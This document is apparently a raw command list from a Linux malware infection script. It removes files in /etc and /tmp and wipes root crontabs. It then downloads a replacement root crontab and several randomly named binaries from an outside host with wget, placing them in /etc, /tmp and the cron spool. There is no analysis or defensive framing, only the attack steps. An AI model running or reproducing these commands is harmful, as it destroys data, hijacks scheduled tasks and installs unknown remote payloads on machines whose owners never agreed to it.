- cd /root;rm -rf dir nohup.out
- cd /etc;rm -rf dir fake.cfg
- cd /etc;rm -rf dir cupsddd.*
- cd /etc;rm -rf dir atddd.*
- cd /etc;rm -rf dir ksapdd.*
- cd /etc;rm -rf dir kysapdd.*
- cd /etc;rm -rf dir sksapdd.*
- cd /etc;rm -rf dir skysapdd.*
- cd /etc;rm -rf dir xfsdxd.*
- cd /etc;rm -rf dir fake.cfg
- cd /etc;rm -rf dir cupsdd.*
- cd /etc;rm -rf dir atdd.*
- cd /etc;rm -rf dir ksapd.*
- cd /etc;rm -rf dir kysapd.*
- cd /etc;rm -rf dir sksapd.*
- cd /etc;rm -rf dir skysapd.*
- cd /etc;rm -rf dir xfsdx.*
- cd /etc;rm -rf dir sfewfesfs
- cd /etc;rm -rf dir gfhjrtfyhuf
- cd /etc;rm -rf dir rewgtf3er4t
- cd /etc;rm -rf dir fdsfsfvff
- cd /etc;rm -rf dir smarvtd
- cd /etc;rm -rf dir whitptabil
- cd /etc;rm -rf dir gdmorpen
- cd /etc;rm -rf dir sfewfesfs.*
- cd /etc;rm -rf dir gfhjrtfyhuf.*
- cd /etc;rm -rf dir rewgtf3er4t.*
- cd /etc;rm -rf dir fdsfsfvff.*
- cd /etc;rm -rf dir smarvtd.*
- cd /etc;rm -rf dir whitptabil.*
- cd /etc;rm -rf dir gdmorpen.*
- cd /etc;rm -rf dir nhgbhhj.*
- cd /tmp;rm -rf dir 1.*
- cd /tmp;rm -rf dir 2.*
- cd /tmp;rm -rf dir 3.*
- cd /tmp;rm -rf dir 4.*
- cd /tmp;rm -rf dir 5.*
- cd /tmp;rm -rf dir jdhe
- cd /tmp;rm -rf dir jdhe.*
- cd /var/spool/cron; rm -rf dir root.*
- cd /var/spool/cron; rm -rf dir root
- cd /var/spool/cron/crontabs; rm -rf dir root.*
- cd /var/spool/cron/crontabs; rm -rf dir root
- cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
- cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
- yes|mv /tmp/root /var/spool/cron
- yes|mv /tmp/root /var/spool/cron/crontabs
- cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
- cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
- cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
- cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
- cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
- cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
- cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
- cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
- cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj